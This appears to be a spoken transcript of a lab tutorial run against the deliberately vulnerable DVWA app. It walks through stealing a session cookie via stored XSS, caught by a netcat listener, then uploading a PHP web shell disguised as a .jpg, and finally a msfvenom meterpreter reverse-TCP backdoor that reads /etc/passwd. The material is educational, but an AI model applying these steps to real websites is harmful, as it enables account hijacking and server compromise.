Hi, hello. See, in this lab, I wanted to demonstrate cross-site scripting, uh, which is a part of your web attacks. And believe me, this is one of the most important web attack which I'm going to demonstrate. I'm going to use this Kali Linux as the hacker version and also Metasploitable as the vulnerability for XSS. So here, before I start my lab, I'm going to just brief about what is cross-site scripting, also known as XSS. It's a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. So here the code which is being written may have vulnerabilities. So cross-site scripting vulnerabilities normally allow an attacker to fall show as a victim user, to carry out any actions that the user is able to perform and to access any of this user's data. So if the victim user has a privileged access, yes, within the application, then the attacker might be able to gain full control over all the application's functionality and data. This is a major vulnerability which is included in top 10 of OWASP. Okay, let me quickly start my experiment on Kali Linux. So here, what I'm going to do is that I have a website which is called as DVWA, Dam Web Vulnerability Application. So which is on Metasploitable. So here you can see this. This is my website. I have logged in. I can say again once again I can log in. So here I say admin and I have password. Okay. So first thing what I need to set is DVW security, which is supposed to be low. Please set this particular one and say setup, create or reset the database. So here I want to test my vulnerability of cross-site scripting. I can say something like hello script alert hacked. Okay, and slash script. If you sign it, if you see a pop-up coming across, then you can see that this is having a cross-site scripting attack. So now I will be showing you how you can compromise this particular script. So for that I have mentioned a short script here. So this is the script, new image src. So this is the Kali IP which I am replacing. Kali IP is 192.168.1.28 with so and so. So that what happened once the script is executed is that the system is compromised. I'll be showing you how you can demonstrate this particular one. Okay, so first thing is that I'm just copying this particular one. Okay, just say copy. I'll try to execute on my Kali Linux on my website. So I can say hello one and say paste. So here I need to increase the size. So I can do this by saying the inspect and then maybe increase the length to 200. Okay, so I have increased the length to 200. Once again I paste. Okay, so now yeah, you can see this. So what I'll do is that before I start, I'll open this Kali Linux and also I'll open the input information, the reverse shell. So here I'll say nc netcat -lvp port number 80. So whatever traffic which comes, it flows into this Kali IP. Okay, Kali. So I'm just opening this. So you can see this, the data when it comes, it flows here. Okay, I'll sign it to the guest book. So you can see the script once again. I'm signing. Okay, so you see this, there is a session ID which has come here. You can it, and now what I'm going to do here, I'm just copying this as a hacker. I'll open this in the full screen. Okay, this side on my browser. See here, this is what I can say is my Windows 7 system. Here I don't know the username and password. I don't know the username and password, but all I have is only the session ID which has come across. So I'm just copying this session ID. You can see here, I can say mark edit, mark, this is my session ID till the end. Okay, say copy, edit, and say copy. This is more important. Security is also low, please remember here, which has come from the website. So in this Chrome, I can also do one more thing. I need to do one more thing. I will just download a plugin of cookie editor for Chrome. Okay, so just download. This is an extension which can be added to your browser. Okay, add to Chrome. Once it is done, you'll get an icon and the browser itself like this, the cookie editor. Okay, add extension. Okay, now this is done, has been added. No need to sync up. In these extensions, in this cookie editor, PHP session ID, I'll replace this one. I'll replace to the newer one which I had, and also the security from high to low. Okay, and I'll save this. Save here. Save here. So now the new cookie has been planted. Okay, I'll remove this one. Login. Just say DBW. You should see the session without login into the website. This is how cross-site scripting creates an access to the hacker without having the login information. Okay, this is cross-site scripting attack. Thank you. In this method of cross-site scripting, what I'm going to do is that I'm going to download this web shell from GitHub, and then I will try to inject this in cross-site scripting attack. So first let me go to the browser. So I'll say in Google web shell, download. I can select this, or I can say web shell PHP. So I'll be pointed to the GitHub. So here, either I can download and upload to this particular one, or I can copy this link address and go to Kali, wget, and say that link. Okay, file name called as file has been downloaded, zip file. So unzip 93. Okay, there is a file called as web shell, easy simple PHP web shell. So I'll just move this web shell, which is about 347 bytes. I will just log into my DVWA, which is having some vulnerabilities. So on the website, okay, here I'm going to make the security as high. So if I want to use this security as high, if I try to upload this file, if I try to upload this file, so if I try to choose my file from the desktop with security high, so and say upload, it won't upload because the security is high. So what I am going to do, I'll make a simple. So this file name of easy, rename easy simple php.jpg, some format I'm going to replace. So what happens when I try to change this one? Choose the file, the same file once again. So just say upload. Yeah, it has been uploaded. Now what you can do, you can copy this entire URL and just replace here. So before, yeah, you can see this one. I'm trying to execute. So I have a shell now. So what I can get is, like, if I say ls minus l, the files are being shown in cat of the web server. You can see all crucial information. Even you can make a socket, you can enter into the network. Okay, so this is how you can consider malicious program. Okay, so now I'll be going to teach the next important one. So next important one, which is by using Metasploit. See, here I want to ensure that I will keep the security low and set up this one, the database as mentioned. So here I will create first vulnerability, a PHP vulnerability, MSF Venom. So I'm going to create this MSF Venom -p PHP / Meterpreter _ reverse TCP. This is the vulnerability. Lhost is my Kali Linux IP. Lhost equal to 192.168 1 dot, I can 1.28. Lport equal to 4444 and -f raw. I'll redirect to backdoor.php. So this creates the PHP malicious program when it's time. Meanwhile, what I can do before the PHP arrives, I can open this what we call as the MSF console. So here MSF console, and also I'll open my browser. Also username admin. DBW security. I'm placing it as low. So just a submit. And first time you can create a database. Okay. So once my file is ready, I can upload the file. So here, as you see, this ls-l backdoor.php is ready. This is vulnerable. This is vulnerable. You can see this one, the same file. I'll upload from the console. Yeah, I'm going to upload this file which has been created, which is there in my home directory. This backdoor.php. Just upload this one. So which has been successfully uploaded. So I'll just copy this one and I'll just see. I'll not execute. I'm just copying over there. Meanwhile, what I'm going to do is that I'm going to the terminal and set up my console. Use exploit multi-handler. Okay. So now use the same payload, set payload PHP Meterpreter _ reverse TCP. Okay, set lhost, my Kali Linux IP, which is I can tell you, which is 1.28. Set lport 4444. Okay, and exploit -j -z. Yeah, please remember this is my payload creation. Okay, so which already I have injected into the web server. So I'm just trying to execute. I'll just minimize this one so that I can see both the windows at the same time. So already reverse handler has started. So what I'm going to do, just executing. I have a session which has been generated. So I can interact with that sessions -i, which will display the informations. I can interact with -i1. Okay, sysinfo. This is my PHP server, Linux Metasploit server. So I can run any commands which are there. When I say question mark, I can run all these commands which are there. Okay, so if I want to say ls-l, I can see the files over there, and also I can say shell, which will run all my commands, cat etc psswd. So it will display it's not. Okay, -u. Okay, that is about PHP, I mean vulnerability using this Metasploit. Okay, thank you. Bye.